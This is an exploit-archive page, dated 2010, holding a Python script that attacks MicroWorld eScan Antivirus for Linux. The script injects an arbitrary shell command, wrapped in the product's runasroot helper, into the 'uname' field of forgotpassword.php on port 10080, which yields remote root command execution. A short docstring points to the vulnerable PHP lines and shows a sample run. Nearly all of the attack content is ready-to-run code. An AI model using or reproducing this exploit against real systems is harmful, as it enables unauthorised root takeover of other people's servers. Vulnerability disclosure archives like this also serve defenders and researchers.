MicroWorld eScan Antivirus Remote Root Command Execution

MicroWorld eScan Antivirus Remote Root Command Execution: Posted Mar 15, 2010; Authored by Mohammed almutairi; This exploit demonstrates a remote root command execution vulnerability in MicroWorld eScan Antivirus versions prior to 3.x.; tags | exploit, remote, root; SHA-256 | ecc744c2220777c10cfe0cf1791fa5a5bdd9af4d84c275d95cec7536fc267c65; Download | Favorite | View

MicroWorld eScan Antivirus Remote Root Command Execution

#!/usr/bin/env python
import sys
from socket import *

#auther: Mohammed almutairi
#(Sa.attacker@gmail.com)
"""
MicroWorld eScan Antivirus < 3.x  Remote Root Command Execution
Package MWADMIN package vulnerabilities (linux)
The Base Packages (MWADMIN and MWAV) must be installed before eScan
Link:
http://www.escanav.com/english/content/products/escan_linux/linux_products.asp
infcted: aLL version 3.X eScan linux
1-Escan for Linux Desktop
2-Escan for Linux file Servers
3-MailScan for Linux and webscan
Tested On RedHat  and Fedora
ULTRA PRIV8 :)

Description:

From /opt/MicroWorld/var/www/htdocs/forgotpassword.php:
include("common_functions.php");  <---> (1)

if ($_POST['forgot'] == "Send Password")
{
        $user = $_POST["uname"]; <--->(2) insecure:(


vulnerable code in forgotpassword.php and common_functions.php 
in (1) $runasroot = "/opt/MicroWorld/sbin/runasroot";
we can injection through via the file forgotpassword.php As you can see (2)
with  remote root Command Execution
>> eScan.py www.***.com
eScan@/bin/sh:$Sa$ => reboot
[*] Done! sent to: www.***.com
"""

def xpl():
  if len(sys.argv) < 2:
                print "[*] MicroWorld eScan Antivirus Remote Root Command Execution"
                print "[*] exploited by Mohammed almutairi"
    print "[*] usage: %s host" % sys.argv[0]
    return

  host = sys.argv[1]
  port = 10080 # default port
  cmd = raw_input("eScan@/bin/sh:$Sa$ => ")
  sock=socket(AF_INET, SOCK_STREAM)
  sock.connect((host,port))
        sh="/opt/MicroWorld/sbin/runasroot /bin/sh -c '%s'" % cmd

        sa= "uname=;%s;" %sh # (;sh;)  ---> Here Play See to ^(2)^
        sa+= "&forgot=Send+Password"
        
        s="POST /forgotpassword.php HTTP/1.1\r\n"
        s+="Host: %s:%d\r\n"%(host, port)
        s+="User-Agent: */*\r\n"
        s+="Accept: ar,en-us;q=0.7,en;q=0.3\r\n"
        s+="Content-Type: application/x-www-form-urlencoded\r\n"
        s+="Content-Length: %d \r\n\r\n"%len(sa)
        s+=sa

  sock.sendall(s)
  print "[*] Done! sent to: %s" % host
  sock.close()

if __name__=="__main__":
        xpl()
  sys.exit(0)

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 172 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

MicroWorld eScan Antivirus Remote Root Command Execution

MicroWorld eScan Antivirus Remote Root Command Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

MicroWorld eScan Antivirus Remote Root Command Execution

Share This

MicroWorld eScan Antivirus Remote Root Command Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems